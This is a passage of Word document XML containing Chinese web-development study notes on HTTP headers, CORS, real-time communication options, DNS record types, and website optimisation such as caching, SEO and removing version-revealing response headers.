          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Transfer-Encoding: chunked(分</w:t>
      </w:r>
      <w:r>
        <w:t>块传递数据到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>客户端）  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Set-Cookie:SS=Q0=5Lb_nQ; path=/search(服务端发送到客户端的暂存数据)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Expires: -1//3种(服务端禁止客户端缓存页面数据)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Cache-Control: no-cache(服务端禁止客户端缓存页面数据)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Pragma: no-cache(服</w:t>
      </w:r>
      <w:r>
        <w:t>务端禁止客户端缓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>存页面数据)   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Connection: close(1.0)/(1.1)Keep-Alive(维护客户端和服务端的连接关系)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Date: Tue, 11 Jul 2000 18:23:51 GMT(服务端响应客户端的时间)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>在服务器响应客户端的时候，带上Access-Control-Allow-Origin头信息，解决跨域的一种方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实时通信方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.Net Signalr+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ajax轮询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WebSocket(SuperWebSocket，WebSocket服务器)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SSE（Server-sent Events服务器发送事件）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="90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域名解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DNS解析流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>常见 域名解析记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A记录：用来指定域名或子域名对应的IP地址记录，保证域名指向对应的主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CNAME记录：别名记录，该记录允许你为自己的主机设置别名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MX记录：邮件路由记录，当发送邮件时，Mail 服务器先对域名进行解析，查找mx记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TXT记录：是域名系统(DNS)中由域名托管服务商存储的一种资源记录，其作用是防止垃圾邮件滥用行为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AAAA记录：指定网站域名对应的IPv6地址记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NS记录：Name Server，用于指定域名是由那个DNS服务器来进行域名解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="90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网站优化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JavaScript和Css模块化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CSS Sprites：将一个页面涉及到的所有零星图片都包含到一张大图中去，这样一来，将N次请求变成一次请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>划分资源域</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>合理运用缓存技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>静态文件（图片、css、js、html ）缓存： cdn技术、squid缓存服务器、浏览器(客户端)缓存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTML5 application cahce API离线缓存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用层缓存：Cache、Redis缓存数据库、memcache缓存数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库缓存：数据库本身的缓存机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>了解浏览器工作机制：Css放顶部，Js放底部，压缩Html，能配置Expires/Cathe-Control，ETag，使用 gzip 压缩</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用ISP(互联网服务提供商)提供的文件存储等技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提高DNS域名解析速度</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>掌握SEO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>确保网站是可以被索引的： robots.txt，Robtots 标签</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>擅长标签编写：带有 H1 标签、关键词放 URL 中、加粗文字、Descripiton 标签、图片文件名、ALT 属性带有关键词</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>删除不必要的HTTP响应头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移除X-AspNet-Version HTTP头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移除X-AspNetMvc-Version HTTP头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移除X-Powered-By HTTP头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移除Server HTTP头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用户数据分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PV IP UV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问流量来源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:tabs>
